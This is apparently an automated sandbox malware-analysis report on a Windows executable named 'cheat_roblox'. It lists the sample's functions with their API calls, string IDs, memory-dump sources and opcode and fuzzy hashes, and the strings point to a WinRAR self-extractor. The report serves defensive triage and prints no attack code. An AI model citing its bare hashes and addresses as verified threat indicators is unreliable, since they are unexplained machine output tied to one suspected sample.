                                                                              • GetProcAddress.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                              • String ID: api-ms-
                                                                              • API String ID: 2559590344-2084034818
                                                                              • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                              • Instruction ID: c2b41188743b3f77e7fbd1058aee25e5022a0a9ce016bf43fc8bc33a1199b484
                                                                              • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                                                                              • Instruction Fuzzy Hash: 3D31C321F1A64281EE31EB16A802679239DFF48BA0F594977DD1DEB390DF3CE4408715
                                                                              Function 00007FF693E81604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E8162B
                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E81648
                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E81664
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                              • API String ID: 667068680-1718035505
                                                                              • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                              • Instruction ID: 41ba949baf0bea4776bc1d1cfbcc89f1dd8de5c38bd56b5c6cd61c8fa6c0a907
                                                                              • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                                                                              • Instruction Fuzzy Hash: 4B111E20E1EB4B81FE758F01A94227423ADEF18794F4D54B7C85EEA360EE3CA8559710
                                                                              Function 00007FF693E6ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E651A4: GetVersionExW.KERNEL32 ref: 00007FF693E651D5
                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6ED8C
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6ED98
                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDA8
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDB6
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EDC4
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF693E55AB4), ref: 00007FF693E6EE05
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                              • Instruction ID: 1d889ddea4a752323a00ddcd70b4672f4800f96ee78d094352cf69f2d3416325
                                                                              • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                                                                              • Instruction Fuzzy Hash: D8517DB2B146558BEB24CFB8D4411AC37B5F748B98B60403AEE0DA7B58DF38E956C700
                                                                              Function 00007FF693E6F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                              • String ID:
                                                                              • API String ID: 2092733347-0
                                                                              • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                              • Instruction ID: eb13d7693ba9eef83cdbd4a4cd628c1469494da4685556d72f85322f730faf8e
                                                                              • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                                                                              • Instruction Fuzzy Hash: B0311962B14A518EFB14CFB5E8911AC3774FB08758B54502AEF0EE7A68EF38D895C710
                                                                              Function 00007FF693E67918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: .rar$exe$rar$sfx
                                                                              • API String ID: 3668304517-630704357
                                                                              • Opcode ID: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                              • Instruction ID: 6694364e18c247ff75810e892af19e00eef1c037a48a002b677890c6d53a314b
                                                                              • Opcode Fuzzy Hash: f48e310f2d4c6838760fd8124c0dfc7220e7dc8c7a549aff28db8dcc178fbc20
                                                                              • Instruction Fuzzy Hash: C4A1BF22A14A0680EB209F25D8562BC3369FF44BA8F441277DE1DA77EADF3CE591C344
                                                                              Function 00007FF693E85CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 2889003569-2084237596
                                                                              • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                              • Instruction ID: b988fdec5e374de0174cc22cb74e3a265e21a72350da4f10f298d833a03c07c4
                                                                              • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                              • Instruction Fuzzy Hash: 17918073E08B918AE721CB65E8412AD7BB4FB04788F14416AEE4DA7B95DF38D195CB00
                                                                              Function 00007FF693E84F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                              • String ID: csm$f
                                                                              • API String ID: 2395640692-629598281
                                                                              • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                              • Instruction ID: ac4798454bdcf74a4665158b559fa22c732cfe52e53b75e7c5c6d875bd5a1c82
                                                                              • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                              • Instruction Fuzzy Hash: EB51B332E1960286EB24CF15E845B3937A9FB40B98F5080B6DE1EA77C8DF78E841C740
                                                                              Function 00007FF693E5CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                              • API String ID: 2102711378-639343689
                                                                              • Opcode ID: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                              • Instruction ID: 0ad4438eeb6e30a8dd8a2f815b7df8bb1336e5fd3ab6f45b4208fe671dc29761
                                                                              • Opcode Fuzzy Hash: 2b861648b180918fd0f02cdc83054ab275c6740b5d877ad0ce6218155adf80f7
                                                                              • Instruction Fuzzy Hash: FC51B162F1874245FE21DB65D8522BE23B9EF847A4F0001B2DE1DE66A6DF3CA885C300
                                                                              Function 00007FF693E77B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$Rect
                                                                              • String ID: RarHtmlClassName
                                                                              • API String ID: 2396740005-1658105358
                                                                              • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                              • Instruction ID: 41f113368349b2cce3e2de5798baf2a3f2b5c59a8069f6c8b96258198e927347
                                                                              • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                                                                              • Instruction Fuzzy Hash: 7851A421A087428AEB74DB22F45637A67A5FF88780F004476EE8FA7B55DF3CE4458700
                                                                              Function 00007FF693E7FD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                              • String ID: sfxcmd$sfxpar
                                                                              • API String ID: 3540648995-3493335439
                                                                              • Opcode ID: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                              • Instruction ID: be14770014f3408627f008716f77fe577fcb2612d44a1f58a3ac1787cbe51d6e
                                                                              • Opcode Fuzzy Hash: 9cd6036ae86cdbcd8d8a5aead61c32137b442908135497355496b2fd8e337c0a
                                                                              • Instruction Fuzzy Hash: 95315072E14A1684EB14CF65E4862AC3379FB48B98F541172DF5EA77AADF38E042C344
                                                                              Function 00007FF693E7FED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                              • API String ID: 0-56093855
                                                                              • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                              • Instruction ID: d2eeb33aa48174dcca34b02bda93ebb40b31bd9c3a5f1c60385131469b36902a
                                                                              • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                              • Instruction Fuzzy Hash: 78211B2590CB8781FA318B16B84617423B8EF8AB88F1400B7D94EFB761DF3CE4868304
                                                                              Function 00007FF693E8BFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                              • Instruction ID: 90b29c2e1fb634872e233a249cfcdd1260899a795deca6f17549065420894afb
                                                                              • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                              • Instruction Fuzzy Hash: 1EF06265A19A4681EF64DF11F4413796364EF88BD0F441077D94FD6665DE3CE884C700
                                                                              Function 00007FF693E945C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID:
                                                                              • API String ID: 3215553584-0
                                                                              • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                              • Instruction ID: 1cd916ed2fe4631d4e1b32e733ee09aceb2cd08dc4baf7b0166c29920029cb4d
                                                                              • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                              • Instruction Fuzzy Hash: 2D81CF62E2865A86F730DF6598426BE27A9FB45B88F0041B7DD0EA3795CF3CA441CB10
                                                                              Function 00007FF693E63AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2398171386-0
                                                                              • Opcode ID: b737af9c4e59d479e3ca736489d1e606a08bd71e1b209dc284b4762885796e28
                                                                              • Instruction ID: 158324147c6fd35c4c156a7891dbc15104e22864f08e2177895ec33a6a0f1363
                                                                              • Opcode Fuzzy Hash: b737af9c4e59d479e3ca736489d1e606a08bd71e1b209dc284b4762885796e28
                                                                              • Instruction Fuzzy Hash: A551A222F04A4699FB718F75E4423BD33B9EB847ACF004676DE1DA67E5DE3894458300
                                                                              Function 00007FF693E93F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 3659116390-0
                                                                              • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                              • Instruction ID: 56aae5ca1f7e2faa6babcbcacf3586bee2ec561dccd753ec2935f18c0330ebb5
                                                                              • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                              • Instruction Fuzzy Hash: E651D172A14A518AF720CF66D8423AD3BB9FB48798F048136DE4EA7B98DF38D545C700
                                                                              Function 00007FF693E81E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
